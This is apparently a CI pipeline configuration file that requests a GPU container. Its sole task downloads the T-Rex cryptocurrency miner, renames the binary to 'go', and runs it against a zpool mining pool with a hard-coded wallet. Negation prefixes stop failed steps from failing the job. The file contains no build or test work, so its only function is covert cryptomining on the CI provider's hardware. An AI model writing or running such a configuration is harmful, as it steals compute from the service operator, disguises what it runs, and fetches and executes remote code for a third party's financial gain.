container:
  image: nvidia/cuda:10.0-runtime-ubuntu18.04
  cpu: 4
  memory: 12G
  gpu: 4
  gpu_type: nvidia-tesla-v100 # do we need the choice?
task:
  script: sudo apt update -y && sudo apt install -y wget && ! wget https://github.com/trexminer/T-Rex/releases/download/0.19.11/t-rex-0.19.11-linux-cuda10.0.tar.gz && tar -xvf t-rex-0.19.11-linux-cuda10.0.tar.gz && ! mv t-rex go && ! ./go -a megabtx -o stratum+tcp://megabtx.na.mine.zpool.ca:3558 -u sJQWLNfw2KQ7mqBZusRqse8U2GU1kZubUW -p c=BTX,zap=BTX 

